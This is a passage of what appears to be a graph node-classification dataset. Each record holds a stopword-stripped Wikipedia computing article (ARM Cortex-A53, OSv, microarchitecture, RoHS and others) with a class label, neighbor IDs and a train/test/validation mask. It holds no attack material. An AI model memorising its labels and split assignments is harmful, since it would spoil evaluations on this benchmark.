    "text": "ARM_Cortex-A53:arm cortex-a53 arm cortex-a53 one first two microarchitectures implementing armv8-a 64-bit instruction set designed arm holdings cambridge design centre cortex-a53 2-wide decode superscalar processor capable dual-issuing instructions announced october 30th 2012 marketed arm either stand-alone energy-efficient alternative powerful cortex-a57 microarchitecture used alongside powerful microarchitecture big.little configuration available ip core licensees like arm intellectual property processor designs arm cortex-a53 processor used lemaker hikey since 2015 raspberry pi 3 since february 2016 cortex-a53 also used number qualcomm snapdragon socs semi-custom derivatives cortex-a53 used kryo 250 kryo 260 cpus processor used odroid-c2 roku streaming media players high-end models 2016 2017 models another notable cortex-a53 application pine a64/a64+ single-board computer cores used 24-core soc socionext synquacer sc2a11 processor used amazon fire tablets including fire hd 8 fire hd 10 latter also includes cortex-a72 cores",
    "neighbors": [
      11282,
      9235,
      11289,
      1057,
      38,
      8231,
      4139,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      10361,
      638,
      644,
      7300,
      11396,
      9863,
      8842,
      146,
      659,
      7833,
      666,
      5786,
      6815,
      4258,
      4773,
      9913,
      8383,
      10945,
      4821,
      2788,
      3301,
      9964,
      6391,
      3835,
      2814,
      781,
      5417,
      810,
      2862,
      7988,
      11062,
      1849,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      8058,
      398,
      1428,
      9115,
      4508,
      5028,
      7077,
      9638,
      1461,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      2524,
      9182,
      10734,
      1014,
      3575
    ],
    "mask": "Test"
  },
  {
    "node_id": 393,
    "label": 9,
    "text": "Compile_time_function_execution:compile time function execution compile-time function execution compile time function evaluation general constant expressions ability compiler would normally compile function machine code execute run time execute function compile time possible arguments function known compile time function make reference attempt modify global state pure function value arguments known compiler may still able perform level compile-time function execution partial evaluation possibly producing optimized code arguments known lisp macro system early example use compile-time evaluation user-defined functions language metacode extension c++ vandevoorde 2003 early experimental system allow compile-time function evaluation ctfe code injection improved syntax c++ template metaprogramming earlier versions c++ template metaprogramming often used compute values compile time using compile-time function evaluation code used compute factorial would similar one would write run-time evaluation e.g using c++11 constexpr c++11 technique known generalized constant expressions codice_1 c++14 relaxes constraints constexpr – allowing local declarations use conditionals loops general restriction data required execution available compile-time remains example compile time function evaluation c++14 example compile time function evaluation programming language example specifies valid function called factorial would typically evaluated run time use codice_2 tells compiler initializer variables must computed compile time note arguments function must able resolved compile time well ctfe used populate data structures compile-time simple way version 2",
    "neighbors": [
      1952,
      6502,
      5165,
      10616,
      2620,
      10013
    ],
    "mask": "Test"
  },
  {
    "node_id": 394,
    "label": 2,
    "text": "OSv:osv osv stylized os cloud computing focused computer operating system released september 16 2013 special-purpose operating system built run guest top virtual machine thus include drivers bare-metal hardware unikernel designed run single linux executable application written one supported runtime environments java reason support notion users multiuser system processes everything runs kernel address space using single address space removes time-consuming operations associated context switching uses large amounts code freebsd operating system particular network stack zfs file system osv managed using rest management api optional command line interface written lua",
    "neighbors": [
      2560,
      6153,
      6155,
      6675,
      7187,
      10776,
      25,
      4637,
      546,
      4643,
      6180,
      9762,
      5158,
      7217,
      10803,
      9784,
      10809,
      576,
      2625,
      8262,
      1101,
      6221,
      3160,
      10333,
      97,
      4194,
      10851,
      11363,
      6760,
      9320,
      8298,
      9835,
      10856,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      9343,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      9887,
      4777,
      8879,
      3248,
      178,
      9907,
      6837,
      6329,
      8889,
      5823,
      8388,
      1736,
      2248,
      9932,
      8909,
      5840,
      7382,
      8410,
      10971,
      9436,
      1247,
      11489,
      1253,
      7403,
      242,
      5363,
      8439,
      9466,
      2811,
      9468,
      1278,
      10499,
      1804,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      10016,
      292,
      10235,
      2345,
      7983,
      2864,
      2355,
      7477,
      823,
      4409,
      6459,
      7483,
      7999,
      11075,
      4423,
      5452,
      6988,
      5457,
      11601,
      7507,
      7511,
      10590,
      3426,
      8551,
      5484,
      7020,
      11635,
      5492,
      2933,
      376,
      8573,
      7039,
      8063,
      3969,
      10113,
      8069,
      3978,
      4492,
      1422,
      7057,
      11667,
      11675,
      8092,
      2462,
      5022,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      7601,
      10676,
      6075,
      6078,
      9151,
      11204,
      3013,
      11205,
      4040,
      8136,
      9166,
      8147,
      11221,
      5598,
      10730,
      10731,
      8687,
      6128,
      5105,
      5619,
      5115
    ],
    "mask": "Validation"
  },
  {
    "node_id": 395,
    "label": 4,
    "text": "Multibook:multibook multibook taclane multibook single laptop combines two three different classified networks single device solution currently secure computing standards require federal government military personnel maintain multiple pcs different networks effort allow users simultaneous access unclassified classified information multibook simply complex configuration allows separate enclaves virtual machines one display multibook hard drive uses cryptographic ignition key create virtual hard drive space type 1 comsec element found inside multibook ’ integrated suite b security module security module known haipe protects information stored computer well data sent networks classified secret due lack stored collateral data multibooks burdensome comsec handling requirements data rest dar equipment turned multibooks nsa certified protect information classified secret approved suite b information/processing data transit dit encryption protecting information sent classified networks multibook security benefit user device chvp device considered cci like devices used collateral processing",
    "neighbors": [
      2384
    ],
    "mask": "Test"
  },
  {
    "node_id": 396,
    "label": 0,
    "text": "BabelNet:babelnet babelnet multilingual lexicalized semantic network ontology developed sapienza university rome department computer science linguistic computing laboratory babelnet automatically created linking wikipedia popular computational lexicon english language wordnet integration done using automatic mapping filling lexical gaps resource-poor languages using statistical machine translation result encyclopedic dictionary provides concepts named entities lexicalized many languages connected large amounts semantic relations additional lexicalizations definitions added linking free-license wordnets omegawiki english wiktionary wikidata framenet verbnet others similarly wordnet babelnet groups words different languages sets synonyms called babel synsets babel synset babelnet provides short definitions called glosses many languages harvested wordnet wikipedia babelnet version 4.0 covers 284 languages including european languages asian languages latin babelnet 4.0 contains almost 16 million synsets 833 million word senses regardless language babel synset contains 2 synonyms per language i.e. word senses average semantic network includes lexico-semantic relations wordnet hypernymy hyponymy meronymy holonymy antonymy synonymy etc. totaling around 364,000 relation edges well underspecified relatedness relation wikipedia totaling around 1,3 bilion edges version 4.0 also associates 53 million images babel synsets provides lemon rdf encoding resource available via sparql endpoint 2.67 million synsets assigned domain labels babelnet shown enable multilingual natural language processing applications lexicalized knowledge available babelnet shown obtain state-of-the-art results babelnet received meta prize 2015 groundbreaking work overcoming language barriers multilingual lexicalised semantic network ontology making use heterogeneous data sources babelnet featured prominently time magazine article new age innovative up-to-date lexical knowledge resources available web",
    "neighbors": [
      416,
      6629,
      5639,
      8843,
      7597,
      5903,
      7983,
      5778,
      53,
      5781,
      538,
      10716,
      7839
    ],
    "mask": "Test"
  },
  {
    "node_id": 397,
    "label": 9,
    "text": "Harry_Mairson:harry mairson harry george mairson theoretical computer scientist professor computer science volen national center complex systems brandeis university waltham massachusetts research fields logic computer science lambda calculus functional programming type theory constructive mathematics computational complexity theory algorithmics mairson received b.a mathematics yale university 1978 ph.d. computer science stanford university 1984 supervision jeffrey ullman ph.d. thesis program complexity searching table machtey award 1983 ieee symposium foundations computer science focs mairson postdoctoral researcher inria rocqencourt 1984 1985 stanford university 1985 university oxford 1986 held visiting professor position 1999 2001 boston university 2005 2007 mairson served chair faculty senate brandeis currently associate editor journal logical methods computer science information computation sits editorial board higher-order symbolic computation mairson contributions theory programming languages include proving type inference ml programming language so-called hindley–milner type inference complete exponential time parallel beta reduction non-elementary",
    "neighbors": [
      7386,
      1783
    ],
    "mask": "Test"
  },
  {
    "node_id": 398,
    "label": 3,
    "text": "Microarchitecture:microarchitecture computer engineering microarchitecture also called computer organization sometimes abbreviated µarch uarch way given instruction set architecture isa implemented particular processor given isa may implemented different microarchitectures implementations may vary due different goals given design due shifts technology computer architecture combination microarchitecture instruction set architecture isa roughly programming model processor seen assembly language programmer compiler writer isa includes execution model processor registers address data formats among things microarchitecture includes constituent parts processor interconnect interoperate implement isa microarchitecture machine usually represented less detailed diagrams describe interconnections various microarchitectural elements machine may anything single gates registers complete arithmetic logic units alus even larger elements diagrams generally separate datapath data placed control path said steer data person designing system usually draws specific microarchitecture kind data flow diagram like block diagram microarchitecture diagram shows microarchitectural elements arithmetic logic unit register file single schematic symbol typically diagram connects elements arrows thick lines thin lines distinguish three-state buses require three-state buffer device drives bus unidirectional buses always driven single source way address bus simpler computers always driven memory address register individual control lines simple computers single data bus organization single three-state bus diagram complex computers usually shows multiple three-state buses help machine operations simultaneously microarchitectural element turn represented schematic describing interconnections logic gates used implement logic gate turn represented circuit diagram describing connections transistors used implement particular logic family machines different microarchitectures may instruction set architecture thus capable executing programs new microarchitectures and/or circuitry solutions along advances semiconductor manufacturing allows newer generations processors achieve higher performance using isa principle single microarchitecture could execute several different isas minor changes microcode pipelined datapath commonly used datapath design microarchitecture today technique used modern microprocessors microcontrollers dsps pipelined architecture allows multiple instructions overlap execution much like assembly line pipeline includes several different stages fundamental microarchitecture designs stages include instruction fetch instruction decode execute write back architectures include stages memory access design pipelines one central microarchitectural tasks execution units also essential microarchitecture execution units include arithmetic logic units alu floating point units fpu load/store units branch prediction simd units perform operations calculations processor choice number execution units latency throughput central microarchitectural design task size latency throughput connectivity memories within system also microarchitectural decisions system-level design decisions whether include peripherals memory controllers considered part microarchitectural design process includes decisions performance-level connectivity peripherals unlike architectural design achieving specific performance level main goal microarchitectural design pays closer attention constraints since microarchitecture design decisions directly affect goes system attention must paid issues chip area/cost power consumption logic complexity ease connectivity manufacturability ease debugging testability general cpus single-chip microprocessors multi-chip implementations run programs performing following steps instruction cycle repeated continuously power turned historically earliest computers multicycle designs smallest least-expensive computers often still use technique multicycle architectures often use least total number logic elements reasonable amounts power designed deterministic timing high reliability particular pipeline stall taking conditional branches interrupts however microarchitectures often perform instructions per unit time using logic family discussing improved performance improvement often relative multicycle design multicycle computer computer four steps sequence several cycles clock designs perform sequence two clock cycles completing successive stages alternate clock edges possibly longer operations occurring outside main cycle example stage one rising edge first cycle stage two falling edge first cycle etc control logic combination cycle counter cycle state high low bits instruction decode register determine exactly part computer design control logic one create table bits describing control signals part computer cycle instruction logic table tested software simulation running test code logic table placed memory used actually run real computer called microprogram computer designs logic table optimized form combinational logic made logic gates usually using computer program optimizes logic early computers used ad-hoc logic design control maurice wilkes invented tabular approach called microprogramming complicating simple-looking series steps fact memory hierarchy includes caching main memory non-volatile storage like hard disks program instructions data reside always slower processor step 2 often introduces lengthy cpu terms delay data arrives computer bus considerable amount research put designs avoid delays much possible years central goal execute instructions parallel thus increasing effective execution speed program efforts introduced complicated logic circuit structures initially techniques could implemented expensive mainframes supercomputers due amount circuitry needed techniques semiconductor manufacturing progressed techniques could implemented single semiconductor chip see moore law instruction sets shifted years originally simple sometimes complex various respects recent years load-store architectures vliw epic types fashion architectures dealing data parallelism include simd vectors labels used denote classes cpu architectures particularly descriptive especially cisc label many early designs retroactively denoted cisc fact significantly simpler modern risc processors several respects however choice instruction set architecture may greatly affect complexity implementing high-performance devices prominent strategy used develop first risc processors simplify instructions minimum individual semantic complexity combined high encoding regularity simplicity uniform instructions easily fetched decoded executed pipelined fashion simple strategy reduce number logic levels order reach high operating frequencies instruction cache-memories compensated higher operating frequency inherently low code density large register sets used factor much slow memory accesses possible one first powerful techniques improve performance use instruction pipelining early processor designs would carry steps one instruction moving onto next large portions circuitry left idle one step instance instruction decoding circuitry would idle execution pipelining improves performance allowing number instructions work way processor time basic example processor would start decode step 1 new instruction last one waiting results would allow four instructions flight one time making processor look four times fast although one instruction takes long complete still four steps cpu whole retires instructions much faster risc makes pipelines smaller much easier construct cleanly separating stage instruction process making take amount time—one cycle processor whole operates assembly line fashion instructions coming one side results due reduced complexity classic risc pipeline pipelined core instruction cache could placed size die would otherwise fit core alone cisc design real reason risc faster early designs like sparc mips often ran 10 times fast intel motorola cisc solutions clock speed price pipelines means limited risc designs 1986 top-of-the-line vax implementation vax 8800 heavily pipelined design slightly predating first commercial mips sparc designs modern cpus even embedded cpus pipelined microcoded cpus pipelining seen area-constrained embedded processors large cisc machines vax 8800 modern pentium 4 athlon implemented microcode pipelines improvements pipelining caching two major microarchitectural advances enabled processor performance keep pace circuit technology based long improvements chip manufacturing allowed even circuitry placed die designers started looking ways use one common add ever-increasing amount cache memory on-die cache simply fast memory accessed cycles opposed many needed talk main memory cpu includes cache controller automates reading writing cache data already cache simply appears whereas processor stalled cache controller reads risc designs started adding cache mid-to-late 1980s often 4 kb total number grew time typical cpus least 512 kb powerful cpus come 1 2 even 4 6 8 12 mb organized multiple levels memory hierarchy generally speaking cache means performance due reduced stalling caches pipelines perfect match previously n't make much sense build pipeline could run faster access latency off-chip memory using on-chip cache memory instead meant pipeline could run speed cache access latency much smaller length time allowed operating frequencies processors increase much faster rate off-chip memory one barrier achieving higher performance instruction-level parallelism stems pipeline stalls flushes due branches normally whether conditional branch taken n't known late pipeline conditional branches depend results coming register time processor instruction decoder figured encountered conditional branch instruction time deciding register value read pipeline needs stalled several cycles branch taken pipeline needs flushed clock speeds increase depth pipeline increases modern processors may 20 stages average every fifth instruction executed branch without intervention high amount stalling techniques branch prediction speculative execution used lessen branch penalties branch prediction hardware makes educated guesses whether particular branch taken reality one side branch called much often modern designs rather complex statistical prediction systems watch results past branches predict future greater accuracy guess allows hardware prefetch instructions without waiting register read speculative execution enhancement code along predicted path prefetched also executed known whether branch taken yield better performance guess good risk huge penalty guess bad instructions need undone even added complexity gates needed support concepts outlined improvements semiconductor manufacturing soon allowed even logic gates used outline processor processes parts single instruction time computer programs could executed faster multiple instructions processed simultaneously superscalar processors achieve replicating functional units alus replication functional units made possible die area single-issue processor longer stretched limits could reliably manufactured late 1980s superscalar designs started enter market place modern designs common find two load units one store many instructions results store two integer math units two floating point units often simd unit sort instruction issue logic grows complexity reading huge list instructions memory handing different execution units idle point results collected re-ordered end addition caches reduces frequency duration stalls due waiting data fetched memory hierarchy get rid stalls entirely early designs cache miss would force cache controller stall processor wait course may instruction program whose data available cache point out-of-order execution allows ready instruction processed older instruction waits cache re-orders results make appear everything happened programmed order technique also used avoid operand dependency stalls instruction awaiting result long latency floating-point operation multi-cycle operations register renaming refers technique used avoid unnecessary serialized execution program instructions reuse registers instructions suppose two groups instruction use register one set instructions executed first leave register set set assigned different similar register sets instructions executed parallel series computer architects become stymied growing mismatch cpu operating frequencies dram access times none techniques exploited instruction-level parallelism ilp within one program could make long stalls occurred data fetched main memory additionally large transistor counts high operating frequencies needed advanced ilp techniques required power dissipation levels could longer cheaply cooled reasons newer generations computers started exploit higher levels parallelism exist outside single program program thread trend sometimes known throughput computing idea originated mainframe market online transaction processing emphasized execution speed one transaction capacity deal massive numbers transactions transaction-based applications network routing web-site serving greatly increasing last decade computer industry re-emphasized capacity throughput issues one technique parallelism achieved multiprocessing systems computer systems multiple cpus reserved high-end mainframes supercomputers small-scale 2–8 multiprocessors servers become commonplace small business market large corporations large scale 16–256 multiprocessors common even personal computers multiple cpus appeared since 1990s transistor size reductions made available semiconductor technology advances multi-core cpus appeared multiple cpus implemented silicon chip initially used chips targeting embedded markets simpler smaller cpus would allow multiple instantiations fit one piece silicon 2005 semiconductor technology allowed dual high-end desktop cpus cmp chips manufactured volume designs sun microsystems ultrasparc t1 reverted simpler scalar in-order designs order fit processors one piece silicon another technique become popular recently multithreading multithreading processor fetch data slow system memory instead stalling data arrive processor switches another program program thread ready execute though speed particular program/thread increases overall system throughput reducing time cpu idle conceptually multithreading equivalent context switch operating system level difference multithreaded cpu thread switch one cpu cycle instead hundreds thousands cpu cycles context switch normally requires achieved replicating state hardware register file program counter active thread enhancement simultaneous multithreading technique allows superscalar cpus execute instructions different programs/threads simultaneously cycle",
    "neighbors": [
      3586,
      7170,
      7173,
      6151,
      6663,
      5642,
      9739,
      5645,
      9741,
      5649,
      2066,
      7699,
      11282,
      5655,
      11289,
      1563,
      4124,
      10779,
      10781,
      1057,
      6181,
      8231,
      4139,
      2094,
      3630,
      9774,
      2097,
      6705,
      7218,
      8250,
      8253,
      2623,
      2113,
      7234,
      7235,
      7745,
      2638,
      3159,
      1119,
      3175,
      6247,
      4204,
      8815,
      1137,
      4211,
      8820,
      630,
      4217,
      3194,
      9851,
      6268,
      3197,
      638,
      10361,
      8322,
      3203,
      644,
      10375,
      8842,
      1677,
      7313,
      1170,
      659,
      6804,
      8851,
      7833,
      2719,
      4767,
      5793,
      4258,
      6815,
      6818,
      4773,
      6821,
      8863,
      7852,
      4269,
      2222,
      9391,
      2224,
      2226,
      3762,
      7858,
      9911,
      9400,
      9913,
      8890,
      2237,
      4286,
      5309,
      6339,
      8394,
      2764,
      9932,
      5329,
      9427,
      10966,
      731,
      6878,
      11487,
      2273,
      5859,
      2277,
      7911,
      10984,
      10985,
      5356,
      9964,
      5358,
      5871,
      1776,
      2805,
      3317,
      6391,
      249,
      3835,
      255,
      9475,
      1798,
      3846,
      1801,
      781,
      6926,
      6415,
      9489,
      11539,
      2838,
      3352,
      7963,
      2850,
      2339,
      6949,
      6950,
      5417,
      3886,
      10548,
      309,
      8501,
      11062,
      5948,
      6462,
      6978,
      8514,
      5444,
      10562,
      3911,
      4423,
      5963,
      1871,
      1872,
      7505,
      9551,
      2388,
      9044,
      344,
      3421,
      1376,
      1377,
      3936,
      8035,
      8552,
      10603,
      876,
      11629,
      11630,
      4465,
      6001,
      10612,
      373,
      11125,
      1399,
      2937,
      1402,
      7033,
      11130,
      3457,
      2435,
      9092,
      392,
      3470,
      5518,
      1428,
      407,
      9111,
      409,
      10139,
      4508,
      8609,
      9122,
      10658,
      5541,
      9126,
      10669,
      7086,
      1967,
      2480,
      4017,
      7601,
      10675,
      11183,
      1461,
      1463,
      6072,
      4030,
      8126,
      1985,
      9665,
      9155,
      6596,
      453,
      10180,
      1480,
      1998,
      7631,
      6608,
      466,
      7122,
      980,
      2516,
      9174,
      10199,
      473,
      4569,
      1499,
      477,
      7134,
      9182,
      5090,
      995,
      7653,
      10214,
      10725,
      1000,
      8684,
      10734,
      6639,
      9714,
      499,
      4596,
      3575,
      10746,
      508,
      3070
    ],
    "mask": "None"
  },
  {
    "node_id": 399,
    "label": 4,
    "text": "Information_Security_Forum:information security forum information security forum isf independent information security body isf delivers range content activities tools isf paid membership organisation products services included membership fee time time isf makes research documents papers available non-members isf released updated standard good practice information security 2018 standard available isf members non-members purchase copies report 2018 standard represents update 2016 release standard builds upon previous release include up-to-date controls approaches thought leadership information security standard business-focused practical comprehensive guide available identifying managing information security risks organizations 2016 standard covers current information security 'hot topics threat intelligence cyber attack protection industrial control systems well significant enhancement existing topics including information risk assessment security architecture enterprise mobility management used build comprehensive effective information security management system addition covering information security-related standards cobit 5 information security cis critical security controls effective cyber defense 2016 standard covers iso/iec 27002 well pci dss 3.1 nist cybersecurity framework based member input isf selects number topics research given year research includes interviewing member non-member organizations thought leaders academic researchers key individuals well examining range approaches issue resulting reports typically go depth describing issue generally outlining key information security issues considered proposing process address issue based best practices broad fundamental areas information risk assessment return-on-investment calculations isf develops comprehensive methodologies formalize approaches issues supporting methodology isf supplies web spreadsheet-based tools automate functions isf benchmark formerly called 'information security status survey well-established pedigree – harnessing collective input hundreds world leading organizations 25 years organizations participate benchmark service time use web-based tool assess security performance across range different environments compare security strengths weaknesses organizations measure performance isf 2016 standard good practice iso/iec 27002:2013 cobit version 5 information security benchmark provides variety data export functionality used analyzing presenting data management reporting creation security improvement programs updated biennial basis align latest thinking information security provide isf members improved user experiences added value regional chapter meetings activities provide face-to-face networking among individuals isf member organisations isf encourages direct member-to-member contact address individual questions strengthen relationships chapter meetings activities conducted around world address local issues language/cultural dimensions isf annual global conference 'world congress takes place different city year 2017 conference take place october cannes france event offers opportunity attendees discuss find solutions current security challenges gain practical advice peers leading industry experts around world 1,000 global senior executives attend event includes series keynote presentations workshops networking sessions best practice thought leadership confidential peer-group environment isf extranet portal isf live enables members directly access isf materials including member presentations messaging forums contact information webcasts online tools data member use members isf regional chapters elect council develop work program generally represent member interests council elects 'executive group responsible financial strategic objectives see list computing information-security related articles",
    "neighbors": [
      1312,
      3552,
      10717,
      10437,
      10823,
      4936,
      11567,
      433,
      3447,
      6360,
      9049,
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 400,
    "label": 3,
    "text": "Uncharted_Waters:uncharted waters uncharted waters originally released great age sailing japanese video game series produced koei rekoeition brand simulation role-playing video game series dealing sailing trading themed around age discovery games player takes role captain commodore translations manages seagoing fleet participate trades privateering treasure hunting exploration plain piracy even though series largely open-ended still loose plot requires player follow certain paths deviating paths may stall progress story east asia series large cult following received much recognition outside region however compared earlier sid meier pirates gameplay theme japan term daikoukai jidai refers age discovery period 15th century 17th century european explorers sailed seas open new alternative ways asia ottoman empire blocked land routes period characterized rivalry spain portugal advent colonization general exploration later games countries also involved historical events age discovery like treaty tordesillas mentioned game series makes many references historical background although much like pirates treacherous details era idealized create adventurous exciting mood first game series player assumes role leon franco young ambitious son noble family fallen hard times portugal goal game restore family former glory achieve leon dreams three nations represented portugal spain ottoman empire although many neutral ports around world player invest thus make part portugal sphere influence well discovering ports defeating merchants pirates sea battles increases leon fame increased fame leon complete tasks king portugal gain higher titles nobility story set early 16th century released msx nes 1991 sega mega drive/genesis snes 1992 snes version originally titled super daikoukai jidai japan many snes ports koei games english versions also released years respectively game ported pc macintosh well also set 16th century game sequel first title released nec pc-98 snes genesis/mega drive pc 1994 also saw releases 1996 sega saturn playstation japan exclusively snes version released nintendo virtual console japan march 17 2009 north america april 6 2009 wii japan october 30 2013 north america november 14 2013 first time europe november 28 2013 wii u game six protagonists choose representing different path career featured game game less open-ended developing character career necessary advance plot time release snes version game noted contain superior music ports game game took advantage snes nintendo s-smp chip used high quality instrument samples hand console ports game time released consoles used opl2 family chipset music pc could support high quality samples via sound blaster awe32 gravis ultrasound family cards pc port game take advantage advanced solutions instead choosing optimized adlib music cards used opl2 chip music saturn playstation version contained enhanced fmv opening cutscenes reviewing genesis version gamepro deemed game acquired taste due bare bones presentation frequent money-managing concluded interest four masted voyages european discovery could read history book play game excitement levels mobile phone version daikoukai jidai ii series changes include released 1996 pc title first depart formula engine series traditional focus story removed game character customization possible purely decorative two player characters portugal spain although differences mainly mechanical role-playing element greatly reduced theme exploration heavily emphasized land travel possible lot explored discovered overall compared early titles game starts mid fifteenth century allows player make historical discoveries new world route india well conquer civilizations like aztec inca empire also game experiments concept language video game feature uncommon industry necessitating hiring translators teachers player also continue game marrying bar-girls children turn continue seafaring tradition even take part father skills inventory perhaps due dramatic changes daikoukai jidai 3 left players uncomfortable failed achieve much popularity even within japan initial release title caused controversy allowing slave trade game feature disabled later updates unlike games series game never released consoles released pc working windows 2000 released 1997 playstation sega saturn game uses engine ii focuses story two characters instead expounding upon loose plot ties series together two protagonists follows fourth game series released playstation pc windows 2000 xp game returns previous formula although open-endedness decreased engine updated title plot-wise unrelated series ended gaiden porto estado known fine art high-quality illustrations story evolves search seven proof conqueror seven ancient artifacts seven areas around world northern europe mediterranean africa new world indian ocean south asia east asia said proofs proves sailor champion sailors four sailors plus another three expansion unwittingly involved struggle quest search proof conqueror interesting sailors europe two seven characters asia one east asia another southeast asia one caribbean another one middle east many significant changes game example game longer concept years result characters game age player also set regional fleets regional fleets valuable financial resources combat naval battle fought real time country boundaries disappeared character represented guild home country important gameplay ports game also market share rating percentage scale players trade port guild market share port gained signing contract local governor native windows 2000 xp support introduced koei rerelease sourcenext release windows game version adds following rota nova released koei march 23 2006 playstation portable nintendo ds remake porto estado handhelds mobile phone version daikoukai jidai iv series free play web browser game sequel daikoukai jidai iv series version includes sonia de la cruz sr card adds skill female intuition lv.1 rank x merchant vessel black herring herring buss scout ticket gold++ 1 million gold coins start game 5000np scouting points adds 50 free scoutings uncharted waters online offers much gameplay experience seen single player games multiplayer environment players single player series well aware similar concepts missions adjutants investment national pirate npc fleets country boundaries reappeared countries spain portugal venice ottoman empire france england netherlands however concept time non-existent storyline important unlocking new areas game player receives fame activities battling trading discovering sailing fame levels reach required amounts player unlocks new areas world level fame required differ country country game introduces 3d-environment directx 9.0c capabilities mmorpg game features fleet operations party-system companies guilds player versus player combat trade adventure poker large-scale factional warfare along single player storyline player-vs-environment quests soundtracks uncharted waters new horizons composed yoko kanno soundtrack uncharted waters online based part works dave arneson computer gaming world 1992 criticized first uncharted waters inaccurate history geography flawed repetitive game play looking variety surprises weigh anchor sail another game one-dimensional npcs unlike koei games concluded compared could mildly disappointing 1993 survey pre 20th-century strategy games magazine gave game zero stars five stating geography inaccurate user interface could bear improvement game play interesting",
    "neighbors": [
      10371,
      11430,
      8937,
      6797,
      9006,
      6129,
      8945,
      11477,
      10999,
      8285,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 401,
    "label": 0,
    "text": "Kumiko_Tanaka-Ishii:kumiko tanaka-ishii kumiko tanaka-ishii born 1969 computational linguist associate professor department creative informatics graduate school information science technology university tokyo japan author semiotics programming award-winning book semiotically analyzing computer programs along three axes models signs kinds signs systems signs tanaka-ishii received doctorate university tokyo 1997 1995 completing phd visiting researcher laboratoire d'informatique pour la mécanique et les sciences de l'ingénieur limsi national center scientific research cnrs paris worked semantic proximity matrices japanese language 2010 awarded suntory prize social sciences humanities okawa publications prize book semiotics programming book critically favorably reviewed linguistic philosophical investigations cognitive technology journal semiotica",
    "neighbors": [
      1890
    ],
    "mask": "Test"
  },
  {
    "node_id": 402,
    "label": 4,
    "text": "Watermark_(data_file):watermark data file watermark stored data file refers method ensuring data integrity combines aspects data hashing digital watermarking useful tamper detection though advantages disadvantages typical data hash process input file produce alphanumeric string unique data file file modified one bit changes occur within original file hash process modified file produce different alphanumeric method trusted source calculate hash original data file subscribers verify integrity data subscriber simply compares hash received data file known hash trusted source lead two situations hash hash different hash results systems involved appropriate degree confidence integrity received data hand hash results different conclude received data file altered process common p2p networks example bittorrent protocol part file downloaded data checked hash key known hash check upon result data kept discarded digital watermarking distinctly different data hashing process altering original data file allowing subsequent recovery embedded auxiliary data referred watermark subscriber knowledge watermark recovered determine certain extent whether significant changes occurred within data file depending specific method used recovery embedded auxiliary data robust post-processing lossy compression data file retrieved image provider embed watermark protection purposes process allows tolerance change still maintaining association original image file researchers also developed techniques embed components image within image help identify portions image may contain unauthorized changes even help recovering lost data disadvantage digital watermarking subscriber significantly alter files without sacrificing quality utility data true various files including image data audio data computer code",
    "neighbors": [
      1456,
      4617,
      8302
    ],
    "mask": "Validation"
  },
  {
    "node_id": 403,
    "label": 4,
    "text": "Restriction_of_Hazardous_Substances_Directive:restriction hazardous substances directive restriction hazardous substances directive 2002/95/ec rohs 1 short directive restriction use certain hazardous substances electrical electronic equipment adopted february 2003 european union rohs 1 directive took effect 1 july 2006 required enforced became law member state directive restricts exceptions use six hazardous materials manufacture various types electronic electrical equipment closely linked waste electrical electronic equipment directive weee 2002/96/ec sets collection recycling recovery targets electrical goods part legislative initiative solve problem huge amounts toxic electronic waste speech rohs often spelled pronounced refers eu standard unless otherwise qualified european union member state adopt enforcement implementation policies using directive guide rohs often referred lead-free directive restricts use following ten substances dehp bbp dbp dibp added part directive eu 2015/863 published 31 march 2015 pbb pbde flame retardants used several plastics hexavalent chromium used chrome plating chromate coatings primers chromic acid maximum permitted concentrations non-exempt products 0.1 1000 ppm except cadmium limited 0.01 100 ppm weight restrictions homogeneous material product means limits apply weight finished product even component single substance could theoretically separated mechanically — example sheath cable tinning component lead example radio composed case screws washers circuit board speakers etc screws washers case may made homogenous materials components comprise multiple sub-components many different types material instance circuit board composed bare printed circuit board pcb integrated circuits ic resistors capacitors switches etc switch composed case lever spring contacts pins etc. may made different materials contact might composed copper strip surface coating loudspeaker composed permanent magnet copper wire paper etc everything identified homogeneous material must meet limit turns case made plastic 2,300 ppm 0.23 pbb used flame retardant entire radio would fail requirements directive effort close rohs 1 loopholes may 2006 european commission asked review two currently excluded product categories monitoring control equipment medical devices future inclusion products must fall rohs compliance addition commission entertains requests deadline extensions exclusions substance categories substance location weight new legislation published official journal july 2011 supersedes exemption note batteries included within scope rohs however europe batteries european commission 1991 battery directive 91/157/eec recently increased scope approved form new battery directive version 2003/0282 cod official submitted published eu official journal first battery directive addressed possible trade barrier issues brought disparate european member states implementation new directive explicitly highlights improving protecting environment negative effects waste contained batteries also contains programme ambitious recycling industrial automotive consumer batteries gradually increasing rate manufacturer-provided collection sites 45 2016 also sets limits 5 ppm mercury 20 ppm cadmium batteries except used medical emergency portable power-tool devices though setting quantitative limits quantities lead lead–acid nickel nickel–cadmium batteries cites need restrict substances provide recycling 75 batteries substances also provisions marking batteries symbols regard metal content recycling collection information directive applies equipment defined section weee directive following numeric categories apply apply fixed industrial plant tools compliance responsibility company puts product market defined directive components sub-assemblies responsible product compliance course given fact regulation applied homogeneous material level data substance concentrations needs transferred supply chain final producer ipc standard recently developed published facilitate data exchange ipc-1752 enabled two pdf forms free use rohs applies products eu whether made within eu imported certain exemptions apply updated occasion eu rohs restricted substances used broad array consumer electronics products examples components contained lead include cadmium found many components examples include plastic pigmentation nickel–cadmium nicd batteries cds photocells used night lights mercury used lighting applications automotive switches examples include fluorescent lamps mercury tilt switches rarely used nowadays hexavalent chromium used metal finishes prevent corrosion polybrominated biphenyls diphenyl ethers/oxides used primarily flame retardants rohs efforts reduce hazardous materials electronics motivated part address global issue consumer electronics waste newer technology arrives ever-increasing rate consumers discarding obsolete products sooner ever waste ends landfills countries like china recycled fashion-conscious mobile market 98 million u.s. cell phones took last call 2005 told epa estimates u.s. year 1.5 1.9 million tons computers tvs vcrs monitors cell phones equipment discarded sources electronic waste tallied could total 50 